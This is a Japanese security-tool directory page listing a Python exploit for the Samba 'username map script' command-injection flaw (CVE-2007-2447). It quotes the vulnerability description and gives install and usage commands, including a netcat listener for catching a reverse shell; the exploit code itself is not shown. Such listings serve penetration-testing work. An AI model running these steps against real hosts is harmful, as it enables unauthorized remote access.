Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2007-2447 — CVE-2007-2447を対象としたSambaのusername map script脆弱性に対するPythonエクスプロイト。シェルメタキャラクタを経由したリモートコマンド実行とリバースシェルペイロード配信を可能にします。 | Kitploit
ツール/GitHubGitHub/0xkn/cve-2007-2447
脆弱性分析エクスプロイトシェルコードペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHub0xkn/cve-2007-2447

CVE-2007-2447

CVE-2007-2447を対象としたSambaのusername map script脆弱性に対するPythonエクスプロイト。シェルメタキャラクタを経由したリモートコマンド実行とリバースシェルペイロード配信を可能にします。

リポジトリを見る
5年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2007-2447 - username map script

「Samba 3.0.0から3.0.25rc3のsmbdにおけるMS-RPC機能は、リモートの攻撃者がshellメタ文字を使用して任意のコマンドを実行することを可能にします。これは(1) SamrChangePassword関数を含み、smb.confオプション「username map script」が有効な場合に発生します。また、リモートの認証済みユーザーが(2) リモートプリンタおよび(3) ファイル共有管理における他のMS-RPC関数でshellメタ文字を使用してコマンドを実行することも可能にします。」

エクスプロイト

インストール:

[*] このエクスプロイトにはPython 3.7以上が必要です。

root@kitploit:~
python3 -m pip install pysmb 

使用方法:

root@kitploit:~
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost -- リモートホスト
  • --lhost -- ローカルホスト
  • --lport -- ローカルポート
  • --rport -- リモートポート [*] オプション。 default=445

リスナーを起動するのを忘れないでください:

root@kitploit:~
nc -lvnp 4444

PoC

image

ツールをダウンロード